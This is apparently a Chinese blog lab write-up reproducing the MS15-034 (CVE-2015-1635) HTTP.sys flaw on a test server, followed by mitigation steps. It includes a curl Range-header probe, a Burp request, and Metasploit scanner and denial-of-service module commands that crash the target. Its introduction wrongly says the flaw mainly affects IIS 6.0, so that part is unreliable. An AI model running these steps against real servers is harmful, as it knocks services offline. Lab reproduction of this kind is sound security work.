CVE-2015-1635-HTTP远程代码执行漏洞复现

CVE-2015-1635-HTTP远程代码执行

CVE-2015-1635 是一个严重的安全漏洞，涉及 HTTP 远程代码执行。以下是关于这个漏洞的介绍： 一、漏洞影响

这个漏洞主要影响微软的 Internet Information Services（IIS）6.0 服务器。当存在该漏洞时，攻击者可以通过发送精心构造的 HTTP 请求，在目标服务器上远程执行代码。这意味着攻击者可以获取对服务器的完全控制，窃取敏感信息、安装恶意软件、篡改网页内容等，对服务器的安全造成极大的威胁。

二、漏洞原理

1. 漏洞存在于 IIS 6.0 处理 HTTP 请求的方式中。IIS 6.0 在处理某些特定的 HTTP 请求时，未能正确地验证和过滤用户输入的数据。
2. 攻击者可以利用这一缺陷，构造包含恶意代码的 HTTP 请求，并发送给目标服务器。
3. 服务器在处理这些请求时，可能会将恶意代码作为合法的指令执行，从而导致远程代码执行。

三、危害程度

1. 数据泄露：攻击者可以获取服务器上存储的敏感信息，如用户密码、数据库内容等。
2. 服务中断：攻击者可以通过执行恶意代码破坏服务器的正常运行，导致服务中断，影响业务的正常进行。
3. 恶意软件传播：攻击者可以在服务器上安装恶意软件，进一步传播到其他系统，扩大攻击范围。

四、修复措施

1. 微软针对这个漏洞发布了安全补丁，用户应及时下载并安装这些补丁，以修复漏洞。
2. 同时，建议采取以下安全措施来增强服务器的安全性：
   • 加强访问控制：限制对服务器的访问，只允许授权用户访问。
   • 定期更新软件：确保服务器上的软件始终保持最新版本，以减少漏洞的风险。
   • 监控服务器活动：定期检查服务器的日志，及时发现异常活动。
   • 加强网络安全防护：使用防火墙、入侵检测系统等网络安全设备，增强服务器的防护能力。

CVE-2015-1635-HTTP远程代码执行漏洞复现

验证服务器中的IIS网站是否工作正常，使用靶机Windows 2008中的IE浏览器访问http://127.0.0.1，访问成功

在这里插入图片描述

测试目标靶机是否存在该漏洞，首先在客户端Windows 10使用命令ping -t检测靶机服务器的运行状态

在这里插入图片描述

然后打开桌面上的PentestBox渗透测试工具集，使用curl工具进行测试，测试命令：curl http://172.16.1.200 -H "Host: 172.16.1.200" -H "Range: bytes=0-18446744073709551615"，测试结果如下：

curl http://172.16.1.200 -H "Host: 172.16.1.200" -H "Range: bytes=0-18446744073709551615"

在这里插入图片描述

根据返回的结果可知：HTTP 416 错误 – 所请求的范围无法满足，此时Web 服务器认为，客户端送的 HTTP 数据流包含一个“范围”请求，规定了一个无法满足的字节范围 - 因为被访问的资源不覆盖这个字节范围。若返回“Requested Range Not Satisfiable”证明此处存在“整数溢出”漏洞。 然后通过Burp Suite来发送测试代码，方便我们观察回包的数据，打开桌面上的burpsuite，并开启浏览器代理，再次访问目标的默认站点页面，右键点击空白处选择Send to Repeater

在这里插入图片描述

然后我们切换到Repeater选项卡中，在GET请求的下面增加一行Range: bytes=0-18446744073709551615,然后点击Go进行转发

在这里插入图片描述

回包数据如下

在这里插入图片描述

结果与上面的步骤验证的结果一致，说明服务器存在MS15_034漏洞。

切换至渗透机Kali Linux，对靶机进行检测。使用命令msfconsole打开metasploit渗透测试平台，使用search命令搜索相关可利用的模块

在这里插入图片描述

根据结果，我们发现有两个可以使用的模块，分别为dos拒绝服务模块、HTTP.SYS扫描模块。 接下来我们先测试扫描模块。使用命令use auxiliary/scanner/http/ms15_034_http_sys_memory_dump来调用扫描模块，使用命令show options查看需要配置的选项

use auxiliary/scanner/http/ms15_034_http_sys_memory_dump

在这里插入图片描述

下面我们来对RHOSTS目标靶机地址进行设置，使用命令set RHOSTS 172.16.1.200，设置完成后使用命令exploit执行扫描模块

set RHOSTS 172.16.1.200

在这里插入图片描述

根据扫描结果可知，目标靶机的IIS服务存在MS15_034漏洞。下面我们直接使用拒绝服务模块，来进行测试，验证漏洞在Windows Server 2008上的可用性。使用命令use auxiliary/dos/http/ms15_034_ulonglongadd来调用HTTP.SYS拒绝服务模块，然后设置RHOSTS目标靶机参数，并进行利用

use auxiliary/dos/http/ms15_034_ulonglongadd

在这里插入图片描述

根据回显信息说明已经发送了DOS请求，下面我们来到靶机上观察现象

在这里插入图片描述

目标靶机已经重启，说明MS15_034漏洞已经成功复现。

漏洞修复

下面我们来针对该漏洞进行临时修复（可能降低IIS性能），回到靶机服务器上，打开Internet信息服务（IIS）管理器，找到Default Web Site主页内容，选择输出缓存，点击打开功能

在这里插入图片描述

在的窗口中选择编辑功能设置，编辑输出缓存设置，取消启用内核缓存以实现暂时的加固

在这里插入图片描述

点击确定按钮

在这里插入图片描述

完成配置之后将IIS服务重启

在这里插入图片描述

再次进入kali渗透测试机器中，再次使用DOS拒绝服务模块进行测试

在这里插入图片描述

回到靶机中，发现攻击模块已经失效，无法造成蓝屏重启现象 经过上面的漏洞检测步骤后，如果存在http.sys漏洞，那么就需要尽快制定并启动加固方案，这些加固从漏洞补丁开始，到产品防护，到整体防护，逐步推进，以下为MS15_034补丁修复的链接：MS15_034补丁修复

在这里插入图片描述

使用IIS的用户，也可以通过Windows Update的方式获得对应的KB3042553补丁，建议用户开启自动更新服务以及时安装最新补丁。如果您觉得这篇文章对您有帮助的话，点赞关注评论三连支持一下吧！